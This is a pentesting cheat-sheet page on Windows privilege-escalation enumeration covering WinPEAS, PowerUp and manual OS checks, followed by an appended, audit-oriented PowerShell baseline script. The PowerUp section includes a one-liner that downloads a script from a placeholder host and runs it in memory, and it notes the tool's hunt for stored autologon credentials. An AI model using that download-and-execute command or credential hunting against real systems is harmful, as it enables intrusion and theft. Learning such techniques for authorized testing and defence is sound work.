Leet Sheet
Enumeration

Last updated 2 years ago

Manual Enumeration

Get OS version:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Get service pack version:

wmic os get servicepackmajorversion

Automatic Enumeration

WinPEAS

Great Windows privesc enumeration script.

If you transfer the results from running the script to a Linux machine, you can view the colourized output with the cat command. Vim doesn't colourize it properly.

To view it with other tools, you have to convert it to UTF-8 first.

iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txt

After that, you can view it with less (the -R flag renders the ANSI colour codes instead of showing them as escape sequences).

less -R winpeas-utf-8.txt

Caveats:

  • When I tested this script, it wasn't able to find autologon credentials, even though PowerUp was able to find them with Get-RegistryAutoLogon (WinPEAS checks for them but said it didn't find any in the "Bart" box on HTB)

PowerUp

This may catch some stuff that WinPEAS might not find, like autologon credentials.

Serve the script over HTTP:

python3 -m http.server 80

From PowerShell, load the module into memory:

IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP_ADDRESS_HERE/PowerUp.ps1');

Invoke all checks:

Invoke-AllChecks | Out-File -Encoding ASCII powerup.txt

Caveats:

If you're running the script on a 64-bit machine, then make sure you're using 64-bit PowerShell.

WinPEAS repository: PEASS-ng/winPEAS at master · carlospolop/PEASS-ng (GitHub)
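The manual OS checks, the 64-bit PowerShell caveat and the autologon credentials that PowerUp finds can be pulled into one read-only baseline. The following is an added example, not code from the Leet Sheet, WinPEAS or PowerUp; the function name Get-PrivescEnumBaseline is mine, and the Winlogon registry path is Microsoft's documented autologon location. It reports whether a plaintext DefaultPassword exists without ever printing it.

```powershell
# Added example: audit baseline for the Windows privesc enumeration checks above.
function Get-PrivescEnumBaseline {
    [CmdletBinding()]
    param()

    # Caveat from the page: 32-bit PowerShell on a 64-bit OS sees the WOW64-redirected
    # registry and System32, so enumeration results would be incomplete.
    $is64Os      = [Environment]::Is64BitOperatingSystem
    $is64Process = [Environment]::Is64BitProcess
    $bitnessOk   = (-not $is64Os) -or $is64Process

    # Same data as 'systeminfo' and 'wmic os get servicepackmajorversion',
    # read via CIM so it still works where wmic.exe has been removed.
    $os = Get-CimInstance -ClassName Win32_OperatingSystem

    # Winlogon autologon settings (what PowerUp's Get-RegistryAutoLogon inspects).
    $winlogonPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $winlogon = Get-ItemProperty -Path $winlogonPath -ErrorAction SilentlyContinue
    $autoLogonOn = ($winlogon.AutoAdminLogon -eq '1')
    # Only record presence of a stored password, never its value.
    $plaintextPasswordStored = -not [string]::IsNullOrEmpty($winlogon.DefaultPassword)

    [PSCustomObject]@{
        OSName                     = $os.Caption
        OSVersion                  = $os.Version
        ServicePackMajor           = $os.ServicePackMajorVersion
        OSArchitecture             = $os.OSArchitecture
        PowerShell64Bit            = $is64Process
        BitnessMatchesOS           = $bitnessOk
        AutoAdminLogonEnabled      = $autoLogonOn
        AutoLogonUser              = $winlogon.DefaultUserName
        PlaintextAutoLogonPassword = $plaintextPasswordStored   # $true is a finding to fix
    }
}

# Usage: run from an elevated prompt, then act on the two boolean findings.
$baseline = Get-PrivescEnumBaseline
if (-not $baseline.BitnessMatchesOS) {
    Write-Warning 'Running 32-bit PowerShell on a 64-bit OS; re-run from 64-bit PowerShell.'
}
if ($baseline.PlaintextAutoLogonPassword) {
    Write-Warning "Winlogon stores a plaintext DefaultPassword for '$($baseline.AutoLogonUser)'; remove it or disable autologon."
}
$baseline | Format-List
```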